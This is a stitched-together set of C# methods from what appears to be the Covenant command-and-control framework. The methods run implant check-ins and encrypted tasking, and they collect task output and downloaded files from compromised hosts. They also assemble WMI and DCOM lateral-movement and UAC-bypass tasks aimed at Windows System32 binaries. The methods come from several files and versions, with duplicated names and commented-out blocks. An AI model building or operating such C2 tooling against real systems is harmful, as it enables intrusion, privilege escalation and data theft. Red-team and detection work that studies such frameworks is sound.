public async Task <string> Disconnect(Grunt grunt, GruntCommand command, List <ParsedParameter> parameters) { string Name = "Disconnect"; StringBuilder toPrint = new StringBuilder(); if (parameters.Count != 2 || !parameters[0].Value.Equals(Name, StringComparison.OrdinalIgnoreCase)) { return(EliteConsole.PrintFormattedErrorLine("Usage: Disconnect <grunt_name>")); } Grunt disconnectGrunt = await _context.Grunts.FirstOrDefaultAsync(G => G.GUID.Equals(parameters[1].Value, StringComparison.OrdinalIgnoreCase)); if (disconnectGrunt == null) { toPrint.Append(EliteConsole.PrintFormattedErrorLine("Invalid GruntName selected: " + parameters[1].Value)); toPrint.Append(EliteConsole.PrintFormattedErrorLine("Usage: Disconnect <grunt_name>")); return(toPrint.ToString()); } List <string> childrenGruntGuids = grunt.Children.ToList(); if (!childrenGruntGuids.Contains(disconnectGrunt.GUID, StringComparer.OrdinalIgnoreCase)) { toPrint.Append(EliteConsole.PrintFormattedErrorLine("Grunt: \"" + parameters[1].Value + "\" is not a child Grunt")); toPrint.Append(EliteConsole.PrintFormattedErrorLine("Usage: Disconnect <grunt_name>")); return(toPrint.ToString()); } GruntTask disconnectTask = await _context.GetGruntTaskByName("Disconnect"); await _context.CreateGruntTasking(new GruntTasking { Id = 0, GruntId = grunt.Id, GruntTaskId = disconnectTask.Id, GruntTask = disconnectTask, Name = Guid.NewGuid().ToString().Replace("-", "").Substring(0, 10), Status = GruntTaskingStatus.Uninitialized, Type = GruntTaskingType.Disconnect, Parameters = new List <string> { disconnectGrunt.GUID }, GruntCommand = command, GruntCommandId = command.Id }); return(toPrint.ToString()); }
public async Task <IActionResult> Create(GruntTaskModel taskModel) { try { GruntTask task = new GruntTask { Name = taskModel.Name, Description = taskModel.Description, Help = taskModel.Help, Code = taskModel.Code, UnsafeCompile = taskModel.UnsafeCompile, TokenTask = taskModel.TokenTask, Options = taskModel.Options }; taskModel.ReferenceSourceLibraries.ForEach(async RSL => { task.Add(await _context.GetReferenceSourceLibrary(RSL)); }); taskModel.ReferenceAssemblies.ForEach(async RA => { task.Add(await _context.GetReferenceAssembly(RA)); }); taskModel.EmbeddedResources.ForEach(async ER => { task.Add(await _context.GetEmbeddedResource(ER)); }); ViewBag.ReferenceSourceLibraries = await _context.GetReferenceSourceLibraries(); ViewBag.ReferenceAssemblies = await _context.GetReferenceAssemblies(); ViewBag.EmbeddedResources = await _context.GetEmbeddedResources(); GruntTask createdTask = await _context.CreateGruntTask(task); return(RedirectToAction(nameof(Edit), new { Id = createdTask.Id })); } catch (Exception e) when(e is ControllerNotFoundException || e is ControllerBadRequestException || e is ControllerUnauthorizedException) { ViewBag.ReferenceSourceLibraries = await _context.GetReferenceSourceLibraries(); ViewBag.ReferenceAssemblies = await _context.GetReferenceAssemblies(); ViewBag.EmbeddedResources = await _context.GetEmbeddedResources(); return(View(new GruntTask())); } }
public ActionResult <string> Get() { this.SetHeaders(); string cookie = this.GetCookie(); API.Models.Grunt gruntModel = this.CovenantClient.ApiGruntsGet().FirstOrDefault(G => G.CookieAuthKey == cookie); if (gruntModel == null || gruntModel.Status != GruntStatus.Active) { // Invalid CookieAuthKey. May not be legitimate Grunt request, respond NotFound return(NotFound()); } gruntModel.LastCheckIn = DateTime.Now.ToString(); CovenantClient.ApiGruntsPut(gruntModel); GruntTasking gruntTasking = CovenantClient.ApiGruntsByIdTaskingsGet(gruntModel.Id ?? default).FirstOrDefault(GT => GT.Status == GruntTaskingStatus.Uninitialized); if (gruntTasking == null) { // No GruntTasking assigned. Respond with empty template, return(Ok(this.GetGetEmptyResponse())); } if (gruntTasking.Type == GruntTaskingType.Assembly) { GruntTask task = CovenantClient.ApiGruntTasksByIdGet(gruntTasking.TaskId ?? default); if (task == null) { // Can't find corresponding task. Should never reach this point. Will just respond NotFound. return(NotFound()); } } gruntTasking.Status = GruntTaskingStatus.Tasked; CovenantClient.ApiGruntsByIdTaskingsByTasknamePut(gruntTasking.GruntId ?? default, gruntTasking.Name, gruntTasking); string responseTasking = JsonConvert.SerializeObject(gruntTasking.TaskingMessage); var message = Covenant.Models.Grunts.GruntEncryptedMessage.Create( Covenant.Models.Grunts.Grunt.Create(gruntModel), Common.CovenantEncoding.GetBytes(responseTasking) ); // Transform response string transformed = this.Profile.Transform(Common.CovenantEncoding.GetBytes(JsonConvert.SerializeObject(message))); // Format transformed response string response = String.Format(this.Profile.HttpPostResponse, transformed); return(Ok(response)); }
public override bool ValidateMenuParameters(string[] parameters, bool forwardEntrance = true) { try { if (forwardEntrance) { if (parameters.Length != 1) { EliteConsole.PrintFormattedErrorLine("Must specify a Task Name."); EliteConsole.PrintFormattedErrorLine("Usage: Task <task_name>"); return(false); } GruntTask gruntTask = this.CovenantClient.ApiGrunttasksByTasknameGet(parameters[0]); if (gruntTask == null) { EliteConsole.PrintFormattedErrorLine("Specified invalid Task Name: " + parameters[0]); EliteConsole.PrintFormattedErrorLine("Usage: Task <task_name>"); return(false); } this.Task = gruntTask; this.MenuTitle = this.Task.Name; } MenuCommand setCommand = GetTaskMenuSetCommand(this.Task.Name, CovenantClient); setCommand.Parameters.FirstOrDefault(P => P.Name == "Option").Values = this.Task.Options .Select(TO => new MenuCommandParameterValue { Value = TO.Name }) .ToList(); this.AdditionalOptions[AdditionalOptions.IndexOf( this.AdditionalOptions.FirstOrDefault(MC => MC.Name == "Set") )] = setCommand; AdditionalOptions[AdditionalOptions.IndexOf( this.AdditionalOptions.FirstOrDefault(MC => MC.Name == "Unset") )] = new MenuCommandGenericUnset(setCommand.Parameters.FirstOrDefault(P => P.Name == "Option").Values); this.Refresh(); } catch (HttpOperationException e) { EliteConsole.PrintFormattedWarningLine("CovenantException: " + e.Response.Content); } return(true); }
public override async void Command(MenuItem menuItem, string UserInput) { try { List <string> commands = UserInput.Split(" ").ToList(); if (commands.Count() < 3 || !commands[0].Equals(this.Name, StringComparison.OrdinalIgnoreCase)) { menuItem.PrintInvalidOptionError(UserInput); return; } GruntTask task = ((TaskMenuItem)menuItem).Task; GruntTaskOption option = task.Options.FirstOrDefault(O => O.Name.Equals(commands[1], StringComparison.OrdinalIgnoreCase)); if (commands[1].Equals("LocalFilePath", StringComparison.OrdinalIgnoreCase)) { string FilePath = Path.Combine(Common.EliteDataFolder, commands[2]); if (!File.Exists(FilePath)) { menuItem.PrintInvalidOptionError(UserInput); EliteConsole.PrintFormattedErrorLine("File: \"" + FilePath + "\" does not exist on the local system."); return; } task.Options.FirstOrDefault(O => O.Name == "FileContents").Value = Convert.ToBase64String(File.ReadAllBytes(FilePath)); task.Options.FirstOrDefault(O => O.Name == "FileName").Value = Path.GetFileName(FilePath); await this.CovenantClient.ApiGrunttasksPutAsync(task); } else if (option == null) { menuItem.PrintInvalidOptionError(UserInput); EliteConsole.PrintFormattedErrorLine("Invalid Set option: \"" + commands[1] + "\""); return; } else { option.Value = String.Join(" ", commands.GetRange(2, commands.Count() - 2)); await this.CovenantClient.ApiGrunttasksPutAsync(task); } } catch (HttpOperationException e) { EliteConsole.PrintFormattedWarningLine("CovenantException: " + e.Response.Content); } }
public async Task <GruntTask> GetGruntTaskByName(string name, Common.DotNetVersion version = Common.DotNetVersion.Net35) { string lower = name.ToLower(); GruntTask task = _context.gruntTasks .Where(T => T.Name.ToLower() == lower) // .Where(T => T.CompatibleDotNetVersions.Contains(version)) /*.Include(T => T.Options) * .Include(T => T.Author) * .Include("GruntTaskReferenceSourceLibraries.ReferenceSourceLibrary") * .Include("GruntTaskReferenceSourceLibraries.ReferenceSourceLibrary.ReferenceSourceLibraryReferenceAssemblies.ReferenceAssembly") * .Include("GruntTaskReferenceSourceLibraries.ReferenceSourceLibrary.ReferenceSourceLibraryEmbeddedResources.EmbeddedResource") * .Include("GruntTaskReferenceAssemblies.ReferenceAssembly") * .Include("GruntTaskEmbeddedResources.EmbeddedResource")*/ .AsEnumerable() .Where(T => T.CompatibleDotNetVersions.Contains(version)) .FirstOrDefault(); if (task == null) { // Probably bad performance here task = _context.gruntTasks /*.Include(T => T.Options) * .Include(T => T.Author) * .Include("GruntTaskReferenceSourceLibraries.ReferenceSourceLibrary") * .Include("GruntTaskReferenceSourceLibraries.ReferenceSourceLibrary.ReferenceSourceLibraryReferenceAssemblies.ReferenceAssembly") * .Include("GruntTaskReferenceSourceLibraries.ReferenceSourceLibrary.ReferenceSourceLibraryEmbeddedResources.EmbeddedResource") * .Include("GruntTaskReferenceAssemblies.ReferenceAssembly") * .Include("GruntTaskEmbeddedResources.EmbeddedResource")*/ .AsEnumerable() .Where(T => T.Aliases.Any(A => A.Equals(lower, StringComparison.CurrentCultureIgnoreCase))) .Where(T => T.CompatibleDotNetVersions.Contains(version)) .FirstOrDefault(); if (task == null) { throw new ControllerNotFoundException($"NotFound - GruntTask with Name: {name}"); } } return(await Task.FromResult(task)); }
public override async void Command(MenuItem menuItem, string UserInput) { Grunt grunt = ((TaskMenuItem)menuItem).Grunt; try { GruntTask task = ((TaskMenuItem)menuItem).Task; GruntTasking gruntTasking = new GruntTasking { TaskId = task.Id, GruntId = grunt.Id, Type = GruntTaskingType.Assembly, Status = GruntTaskingStatus.Uninitialized, TokenTask = task.TokenTask, TaskingCommand = UserInput.ToLower() == "Start" ? (task.Name + " " + String.Join(' ', task.Options.Select(O => "/" + O.Name.ToLower() + " " + O.Value).ToList())) : UserInput }; await this.CovenantClient.ApiGruntsByIdTaskingsPostAsync(grunt.Id ?? default, gruntTasking); } catch (HttpOperationException) { EliteConsole.PrintFormattedErrorLine("Failed starting task on Grunt: " + grunt.Name); } }
public ActionResult <GruntTask> EditGruntTask(int id, [FromBody] GruntTask task) { GruntTask updatingTask = _context.GruntTasks.FirstOrDefault(T => T.Id == id); if (updatingTask == null || updatingTask.Id != task.Id) { return(NotFound()); } updatingTask.Options = _context.GruntTaskOptions.Where(O => O.TaskId == updatingTask.Id).ToList(); task.Options.ForEach(O => { GruntTask.GruntTaskOption updatingTaskOption = updatingTask.Options.FirstOrDefault(TO => TO.Id == O.Id); if (updatingTaskOption == null) { return; } updatingTaskOption.Value = O.Value; }); _context.GruntTasks.Update(updatingTask); _context.SaveChanges(); return(Ok(updatingTask)); }
public override bool ValidateMenuParameters(string[] parameters, bool forwardEntrance = true) { if (forwardEntrance) { if (parameters.Length != 1) { EliteConsole.PrintFormattedErrorLine("Must specify a Task Name."); EliteConsole.PrintFormattedErrorLine("Usage: Task <task_name>"); return(false); } GruntTask gruntTask = CovenantClient.ApiGruntTasksByTasknameGet(parameters[0]); if (gruntTask == null) { EliteConsole.PrintFormattedErrorLine("Specified invalid Task Name: " + parameters[0]); EliteConsole.PrintFormattedErrorLine("Usage: Task <task_name>"); return(false); } this.task = gruntTask; this.MenuTitle = this.task.Name; } this.Refresh(); return(true); }
public ActionResult <GruntTasking> CreateGruntTasking(int id, [FromBody] GruntTasking gruntTasking) { Grunt grunt = _context.Grunts.FirstOrDefault(G => G.Id == id); if (grunt == null) { return(NotFound($"NotFound - Grunt with id: {id}")); } CovenantUser taskingUser = this.GetCurrentUser(); if (taskingUser == null) { return(NotFound($"NotFound - CovenantUser")); } gruntTasking.TaskingUser = taskingUser.UserName; gruntTasking.TaskingTime = DateTime.UtcNow; if (gruntTasking.Type == GruntTaskingType.Assembly) { GruntTask task = _context.GruntTasks.Include(T => T.Options).FirstOrDefault(T => T.Id == gruntTasking.TaskId); if (task == null) { return(NotFound($"NotFound - GruntTask with id: {gruntTasking.TaskId}")); } List <string> parameters = task.Options.Select(O => O.Value).ToList(); if (task.Name.ToLower() == "wmigrunt") { Launcher l = _context.Launchers.FirstOrDefault(L => L.Name.ToLower() == parameters[1].ToLower()); if (l == null || l.LauncherString == null || l.LauncherString.Trim() == "") { return(NotFound($"NotFound - Launcher with name: {parameters[1]}")); } else { parameters[1] = l.LauncherString; } } else if (task.Name.ToLower() == "dcomgrunt") { Launcher l = _context.Launchers.FirstOrDefault(L => L.Name.ToLower() == parameters[1].ToLower()); if (l == null || l.LauncherString == null || l.LauncherString.Trim() == "") { return(NotFound($"NotFound - Launcher with name: {parameters[1]}")); } else { // Add .exe exetension if needed List <string> split = l.LauncherString.Split(" ").ToList(); parameters[1] = split.FirstOrDefault(); if (!parameters[1].EndsWith(".exe", StringComparison.OrdinalIgnoreCase)) { parameters[1] += ".exe"; } // Add command parameters split.RemoveAt(0); parameters.Insert(2, String.Join(" ", split.ToArray())); string Directory = "C:\\WINDOWS\\System32\\"; if (parameters[1].Equals("powershell.exe", StringComparison.OrdinalIgnoreCase)) { Directory += "WindowsPowerShell\\v1.0\\"; } else if (parameters[1].Equals("wmic.exe", StringComparison.OrdinalIgnoreCase)) { Directory += "wbem\\"; } parameters.Insert(3, Directory); } } else if (task.Name.ToLower() == "dcomcommand") { // Add .exe exetension if needed List <string> split = parameters[1].Split(" ").ToList(); parameters[1] = split[0]; if (!parameters[1].EndsWith(".exe", StringComparison.OrdinalIgnoreCase)) { parameters[1] += ".exe"; } // Add command parameters split.RemoveAt(0); parameters.Insert(2, String.Join(" ", split.ToArray())); string Directory = "C:\\WINDOWS\\System32\\"; if (parameters[1].Equals("powershell.exe", StringComparison.OrdinalIgnoreCase)) { Directory += "WindowsPowerShell\\v1.0\\"; } else if (parameters[1].Equals("wmic.exe", StringComparison.OrdinalIgnoreCase)) { Directory += "wbem\\"; } parameters.Insert(3, Directory); } else if (task.Name.ToLower() == "bypassuacgrunt") { Launcher l = _context.Launchers.FirstOrDefault(L => L.Name.ToLower() == parameters[0].ToLower()); if (l == null || l.LauncherString == null || l.LauncherString.Trim() == "") { return(NotFound($"NotFound - Launcher with name: {parameters[0]}")); } else { // Add .exe exetension if needed string[] split = l.LauncherString.Split(" "); if (!parameters[0].EndsWith(".exe", StringComparison.OrdinalIgnoreCase)) { parameters[0] += ".exe"; } // Add parameters need for BypassUAC Task string ArgParams = String.Join(" ", split.ToList().GetRange(1, split.Count() - 1)); string Directory = "C:\\WINDOWS\\System32\\"; if (parameters[0].Equals("powershell.exe", StringComparison.OrdinalIgnoreCase)) { Directory += "WindowsPowerShell\\v1.0\\"; } else if (parameters[0].Equals("wmic.exe", StringComparison.OrdinalIgnoreCase)) { Directory += "wbem\\"; } parameters.Add(ArgParams); parameters.Add(Directory); parameters.Add("0"); } } else if (task.Name.ToLower() == "bypassuaccommand") { // Add .exe exetension if needed string[] split = parameters[0].Split(" "); if (!parameters[0].EndsWith(".exe", StringComparison.OrdinalIgnoreCase)) { parameters[0] += ".exe"; } // Add parameters need for BypassUAC Task string ArgParams = String.Join(" ", split.ToList().GetRange(1, split.Count() - 1)); string Directory = "C:\\WINDOWS\\System32\\"; if (parameters[0].Equals("powershell.exe", StringComparison.OrdinalIgnoreCase)) { Directory += "WindowsPowerShell\\v1.0\\"; } else if (parameters[0].Equals("wmic.exe", StringComparison.OrdinalIgnoreCase)) { Directory += "wbem\\"; } parameters.Add(ArgParams); parameters.Add(Directory); parameters.Add("0"); } try { gruntTasking.Compile(task, grunt, parameters); } catch (Exception e) { Console.Error.WriteLine("Task Compilation failed: " + e.Message + e.StackTrace); return(BadRequest("Task returned compilation errors:" + e.Message + e.StackTrace)); } } else if (gruntTasking.Type == GruntTaskingType.Connect) { string hostname = gruntTasking.GruntTaskingMessage.Message.Split(",")[0]; string pipename = gruntTasking.GruntTaskingMessage.Message.Split(",")[1]; if (hostname == "localhost" || hostname == "127.0.0.1") { hostname = grunt.Hostname; } gruntTasking.TaskingMessage = hostname + "," + pipename; } _context.GruntTaskings.Add(gruntTasking); _context.Events.Add(new Event { Time = gruntTasking.TaskingTime, MessageHeader = "[" + gruntTasking.TaskingTime + " UTC] Grunt: " + grunt.Name + " has " + "been assigned GruntTasking: " + gruntTasking.Name, MessageBody = "(" + gruntTasking.TaskingUser + ") > " + gruntTasking.TaskingCommand, Level = Event.EventLevel.Highlight, Context = grunt.Name }); _context.SaveChanges(); return(CreatedAtRoute(nameof(GetGruntTasking), new { id = id, tid = gruntTasking.Id }, gruntTasking)); }
public void Add(GruntTask entity) { gruntTasks.Add(entity); }
public Task <GruntTask> EditGruntTask(GruntTask task) { return(_connection.InvokeAsync <GruntTask>("EditGruntTask", task)); }
public Task <GruntTask> CreateGruntTask(GruntTask task) { return(_connection.InvokeAsync <GruntTask>("CreateGruntTask", task)); }
public Task <string> ParseParametersIntoTask(GruntTask task, List <ParsedParameter> parameters) { return(_connection.InvokeAsync <string>("ParseParametersIntoTask", task, parameters)); }
public async Task <GruntTask> CreateGruntTask(GruntTask task) { //Need to consider restructuring this method and the context class //The way it is currently done is built around interacting with a sqllite db. //need to decide if the Empire server will manage the DB directly. List <GruntTaskOption> options = task.Options.ToList(); List <EmbeddedResource> resources = task.EmbeddedResources.ToList(); List <ReferenceAssembly> assemblies = task.ReferenceAssemblies.ToList(); List <ReferenceSourceLibrary> libraries = task.ReferenceSourceLibraries.ToList(); task.Options = new List <GruntTaskOption>(); task.EmbeddedResources.ForEach(ER => task.Remove(ER)); task.ReferenceAssemblies.ForEach(RA => task.Remove(RA)); task.ReferenceSourceLibraries.ForEach(RSL => task.Remove(RSL)); task.Id = _context.GetNextTaskID(); foreach (GruntTaskOption option in options) { option.GruntTaskId = task.Id; //since the option is being added to the task not sure the options need to be stored separately //this was a structure done for the covenant Db _context.Add(option); task.Options.Add(option); } foreach (EmbeddedResource resource in resources) { await this.CreateEntities( new GruntTaskEmbeddedResource { EmbeddedResource = await this.GetEmbeddedResourceByName(resource.Name), GruntTask = task } ); task.Add(resource); } foreach (ReferenceAssembly assembly in assemblies) { //This is all Database schema based so doesn't work without the databasse await this.CreateEntities( new GruntTaskReferenceAssembly { ReferenceAssembly = await this.GetReferenceAssemblyByName(assembly.Name, assembly.DotNetVersion), GruntTask = task } ); //instead do this task.Add(assembly); } foreach (ReferenceSourceLibrary library in libraries) { /* await this.CreateEntities( * new GruntTaskReferenceSourceLibrary * { * ReferenceSourceLibrary = await this.GetReferenceSourceLibraryByName(library.Name), * GruntTask = task * } * );*/ task.Add(library); } //add the Grunt task to teh context list _context.Add(task); // _notifier.OnCreateGruntTask(this, task); return(await this.GetGruntTask(task.Id)); }
// post task private ActionResult PostTask(Covenant.Models.Grunts.GruntEncryptedMessage outputMessage) { string cookie = this.GetCookie(); API.Models.Grunt gruntModel = this.CovenantClient.ApiGruntsGet().FirstOrDefault(G => G.CookieAuthKey == cookie); if (gruntModel == null || gruntModel.Status != GruntStatus.Active) { // Invalid CookieAuthKey. May not be legitimate Grunt request, respond NotFound return(NotFound()); } string TaskName = outputMessage.Meta; GruntTasking gruntTasking = CovenantClient.ApiGruntsByIdTaskingsByTasknameGet(gruntModel.Id ?? default, TaskName); if (gruntTasking == null || gruntModel.Id != gruntTasking.GruntId) { // Invalid taskname. May not be legitimate Grunt request, respond NotFound return(NotFound()); } var realGrunt = Covenant.Models.Grunts.Grunt.Create(gruntModel); if (realGrunt == null || realGrunt.Status != Covenant.Models.Grunts.Grunt.GruntStatus.Active) { // Invalid Grunt. May not be legitimate Grunt request, respond NotFound return(NotFound()); } if (!outputMessage.VerifyHMAC(Convert.FromBase64String(realGrunt.GruntNegotiatedSessionKey))) { // Invalid signature. Almost certainly not a legitimate Grunt request, responsd NotFound return(NotFound()); } string taskOutput = Common.CovenantEncoding.GetString(realGrunt.SessionDecrypt(outputMessage)); gruntTasking.GruntTaskOutput = taskOutput; gruntTasking.Status = GruntTaskingStatus.Completed; if (gruntTasking.Type == GruntTaskingType.Kill) { gruntModel.Status = GruntStatus.Killed; CovenantClient.ApiGruntsPut(gruntModel); } CovenantClient.ApiGruntsByIdTaskingsByTasknamePut(gruntTasking.GruntId ?? default, gruntTasking.Name, gruntTasking); GruntTask DownloadTask = CovenantClient.ApiGruntTasksGet().FirstOrDefault(GT => GT.Name == "Download"); if (gruntTasking.TaskId == DownloadTask.Id) { CovenantClient.ApiEventsPost(new EventModel { Message = "Grunt: " + realGrunt.Name + " has completed GruntTasking: " + gruntTasking.Name, Level = EventLevel.Highlight, Context = realGrunt.Name }); string FileName = Common.CovenantEncoding.GetString(Convert.FromBase64String(gruntTasking.GruntTaskingAssembly.Split(",")[1])); CovenantClient.ApiEventsDownloadPost(new DownloadEvent { Message = "Downloaded: " + FileName + "\r\n" + "Syncing to Elite...", Level = EventLevel.Info, Context = realGrunt.Name, FileName = FileName, FileContents = gruntTasking.GruntTaskOutput, Progress = DownloadProgress.Complete }); } else { CovenantClient.ApiEventsPost(new EventModel { Message = "Grunt: " + realGrunt.Name + " has completed GruntTasking: " + gruntTasking.Name, Level = EventLevel.Highlight, Context = realGrunt.Name }); CovenantClient.ApiEventsPost(new EventModel { Message = gruntTasking.GruntTaskOutput, Level = EventLevel.Info, Context = realGrunt.Name }); } return(Ok()); }
public override void Command(MenuItem menuItem, string UserInput) { try { menuItem.Refresh(); GruntTask task = ((TaskMenuItem)menuItem).Task; EliteConsoleMenu menu = new EliteConsoleMenu(EliteConsoleMenu.EliteConsoleMenuType.Parameter, "Task: " + task.Name) { ShouldShortenFields = false }; menu.Rows.Add(new List <string> { "Name:", task.Name }); menu.Rows.Add(new List <string> { "Description:", task.Description }); if (task.ReferenceAssemblies.Any()) { menu.Rows.Add(new List <string> { "ReferenceAssemblies:", String.Join(",", task.ReferenceAssemblies) }); } if (task.ReferenceSourceLibraries.Any()) { menu.Rows.Add(new List <string> { "ReferenceSourceLibraries:", String.Join(",", task.ReferenceSourceLibraries) }); } if (task.EmbeddedResources.Any()) { menu.Rows.Add(new List <string> { "EmbeddedResources:", String.Join(",", task.EmbeddedResources) }); } // string usage = "Usage: " + task.Name; // foreach (GruntTaskOption o in task.Options) // { // usage += " <" + o.Name.ToLower() + ">"; // } // menu.Rows.Add(new List<string> { "Usage:", usage }); if (task.Options.Any()) { foreach (GruntTaskOption o in task.Options) { menu.Rows.Add(new List <string> { "Parameter:" }); menu.Rows.Add(new List <string> { " Name:", o.Name }); menu.Rows.Add(new List <string> { " Description:", o.Description }); menu.Rows.Add(new List <string> { " Value:", o.Value }); } } menu.Print(); } catch (HttpOperationException e) { EliteConsole.PrintFormattedWarningLine("CovenantException: " + e.Response.Content); } }
public async Task <GruntCommand> Input(CovenantUser user, Grunt grunt, string UserInput) { GruntCommand GruntCommand = await _context.CreateGruntCommand(new GruntCommand { Command = GetCommandFromInput(UserInput), CommandTime = DateTime.UtcNow, User = user, GruntId = grunt.Id, Grunt = grunt, CommandOutputId = 0, CommandOutput = new CommandOutput() }, _grunthub, _eventhub); List <ParsedParameter> parameters = ParseParameters(UserInput).ToList(); GruntTask commandTask = null; try { commandTask = await _context.GetGruntTaskByName(parameters.FirstOrDefault().Value); if (commandTask.Options.Count == 1 && new List <string> { "Command", "ShellCommand", "PowerShellCommand", "Code" }.Contains(commandTask.Options[0].Name)) { parameters = new List <ParsedParameter> { new ParsedParameter { Value = commandTask.Name, Label = "", IsLabeled = false, Position = 0 }, new ParsedParameter { Value = UserInput.Substring(UserInput.IndexOf(" ", StringComparison.Ordinal) + 1).Trim('"'), Label = "", IsLabeled = false, Position = 0 } }; } } catch (ControllerNotFoundException) { } string output = ""; if (parameters.FirstOrDefault().Value.ToLower() == "show") { output = await Show(grunt); } else if (parameters.FirstOrDefault().Value.ToLower() == "help") { output = await Help(parameters); } else if (parameters.FirstOrDefault().Value.ToLower() == "sharpshell") { output = await SharpShell(grunt, GruntCommand, parameters); } else if (parameters.FirstOrDefault().Value.ToLower() == "kill") { output = await Kill(grunt, GruntCommand, parameters); } else if (parameters.FirstOrDefault().Value.ToLower() == "set") { output = await Set(grunt, GruntCommand, parameters); } else if (parameters.FirstOrDefault().Value.ToLower() == "history") { output = await History(grunt, parameters); } else if (parameters.FirstOrDefault().Value.ToLower() == "connect") { output = await Connect(grunt, GruntCommand, parameters); } else if (parameters.FirstOrDefault().Value.ToLower() == "disconnect") { output = await Disconnect(grunt, GruntCommand, parameters); } else if (parameters.FirstOrDefault().Value.ToLower() == "jobs") { output = await Jobs(grunt, GruntCommand, parameters); } else if (parameters.FirstOrDefault().Value.ToLower() == "note") { grunt.Note = string.Join(" ", parameters.Skip(1).Select(P => P.Value).ToArray()); await _context.EditGrunt(grunt, user, _grunthub, _eventhub); output = "Note: " + grunt.Note; } else if (parameters.FirstOrDefault().Value.ToLower() == "powershellimport") { grunt.PowerShellImport = parameters.Count >= 2 ? parameters[1].Value : ""; await _context.EditGrunt(grunt, user, _grunthub, _eventhub); output = "PowerShell Imported"; } else if (commandTask != null) { parameters = parameters.Skip(1).ToList(); if (parameters.Count() < commandTask.Options.Count(O => !O.Optional)) { _context.Entry(GruntCommand).State = EntityState.Detached; GruntCommand.CommandOutput.Output = EliteConsole.PrintFormattedErrorLine(GetUsage(commandTask)); return(await _context.EditGruntCommand(GruntCommand, _grunthub, _eventhub)); } // All options begin unassigned List <bool> OptionAssignments = commandTask.Options.Select(O => false).ToList(); commandTask.Options.ForEach(O => O.Value = ""); for (int i = 0; i < parameters.Count; i++) { if (parameters[i].IsLabeled) { var option = commandTask.Options.FirstOrDefault(O => O.Name.Equals(parameters[i].Label, StringComparison.OrdinalIgnoreCase)); option.Value = parameters[i].Value; OptionAssignments[commandTask.Options.IndexOf(option)] = true; } else { GruntTaskOption nextOption = null; // Find next unassigned option for (int j = 0; j < commandTask.Options.Count; j++) { if (!OptionAssignments[j]) { nextOption = commandTask.Options[j]; OptionAssignments[j] = true; break; } } if (nextOption == null) { // This is an extra parameter _context.Entry(GruntCommand).State = EntityState.Detached; GruntCommand.CommandOutput.Output = EliteConsole.PrintFormattedErrorLine(GetUsage(commandTask)); return(await _context.EditGruntCommand(GruntCommand, _grunthub, _eventhub)); } nextOption.Value = parameters[i].Value; } } // Check for unassigned required options for (int i = 0; i < commandTask.Options.Count; i++) { if (!OptionAssignments[i] && !commandTask.Options[i].Optional) { // This is an extra parameter StringBuilder toPrint = new StringBuilder(); toPrint.Append(EliteConsole.PrintFormattedErrorLine(commandTask.Options[i].Name + " is required.")); toPrint.Append(EliteConsole.PrintFormattedErrorLine(GetUsage(commandTask))); _context.Entry(GruntCommand).State = EntityState.Detached; GruntCommand.CommandOutput.Output = toPrint.ToString(); return(await _context.EditGruntCommand(GruntCommand, _grunthub, _eventhub)); } } // Parameters have parsed successfully commandTask = await _context.EditGruntTask(commandTask); await StartTask(grunt, commandTask, GruntCommand); } else { output = EliteConsole.PrintFormattedErrorLine("Unrecognized command"); } _context.Entry(GruntCommand).State = EntityState.Detached; GruntCommand.CommandOutput.Output = output; return(await _context.EditGruntCommand(GruntCommand, _grunthub, _eventhub)); }
public void Update(GruntTask entity) { gruntTasks[gruntTasks.FindIndex(ind => ind.Name == entity.Name)] = entity; }
public async Task <GruntTask> EditGruntTask(GruntTask task) { /*GruntTask updatingTask = await this.GetGruntTask(task.Id); * updatingTask.Name = task.Name; * updatingTask.Description = task.Description; * updatingTask.Help = task.Help; * updatingTask.Aliases = task.Aliases; * if (updatingTask.Code != task.Code) * { * updatingTask.Code = task.Code; * updatingTask.Compiled = false; * } * else * { * updatingTask.Compiled = task.Compiled; * } * updatingTask.UnsafeCompile = task.UnsafeCompile; * updatingTask.TokenTask = task.TokenTask; * updatingTask.TaskingType = task.TaskingType; * * task.Options.Where(O => O.Id == 0).ToList().ForEach(async O => await this.CreateGruntTaskOption(O)); * var removeOptions = updatingTask.Options.Select(UT => UT.Id).Except(task.Options.Select(O => O.Id)); * removeOptions.ToList().ForEach(RO => updatingTask.Options.Remove(updatingTask.Options.FirstOrDefault(UO => UO.Id == RO))); * foreach (var option in updatingTask.Options) * { * var newOption = task.Options.FirstOrDefault(T => T.Id == option.Id); * if (newOption != null) * { * option.Name = newOption.Name; * option.Description = newOption.Description; * option.Value = newOption.Value; * option.SuggestedValues = newOption.SuggestedValues; * option.Optional = newOption.Optional; * option.DisplayInCommand = newOption.DisplayInCommand; * } * } * * var removeAssemblies = updatingTask.ReferenceAssemblies.Select(MRA => MRA.Id).Except(task.ReferenceAssemblies.Select(RA => RA.Id)); * var addAssemblies = task.ReferenceAssemblies.Select(MRA => MRA.Id).Except(updatingTask.ReferenceAssemblies.Select(MRA => MRA.Id)); * removeAssemblies.ToList().ForEach(async RA => updatingTask.Remove(await this.GetReferenceAssembly(RA))); * addAssemblies.ToList().ForEach(async AA => updatingTask.Add(await this.GetReferenceAssembly(AA))); * * var removeResources = updatingTask.EmbeddedResources.Select(MER => MER.Id).Except(task.EmbeddedResources.Select(ER => ER.Id)); * var addResources = task.EmbeddedResources.Select(MER => MER.Id).Except(updatingTask.EmbeddedResources.Select(MER => MER.Id)); * removeResources.ToList().ForEach(async RR => updatingTask.Remove(await this.GetEmbeddedResource(RR))); * addResources.ToList().ForEach(async AR => updatingTask.Add(await this.GetEmbeddedResource(AR))); * * var removeLibraries = updatingTask.ReferenceSourceLibraries.Select(MRSL => MRSL.Id).Except(task.ReferenceSourceLibraries.Select(RSL => RSL.Id)); * var addLibraries = task.ReferenceSourceLibraries.Select(RSL => RSL.Id).Except(updatingTask.ReferenceSourceLibraries.Select(MRSL => MRSL.Id)); * removeLibraries.ToList().ForEach(async RL => updatingTask.Remove(await this.GetReferenceSourceLibrary(RL))); * addLibraries.ToList().ForEach(async AL => updatingTask.Add(await this.GetReferenceSourceLibrary(AL))); * * GruntTaskAuthor author = await _context.GruntTaskAuthors.FirstOrDefaultAsync(A => A.Name == task.Author.Name); * if (author != null) * { * updatingTask.AuthorId = author.Id; * updatingTask.Author = author; * } * else * { * await _context.GruntTaskAuthors.AddAsync(task.Author); * await _context.SaveChangesAsync(); * updatingTask.AuthorId = task.Author.Id; * updatingTask.Author = task.Author; * } * * _context.GruntTasks.Update(updatingTask); * await _context.SaveChangesAsync(); * * // _notifier.OnEditGruntTask(this, updatingTask);*/ return(null); }
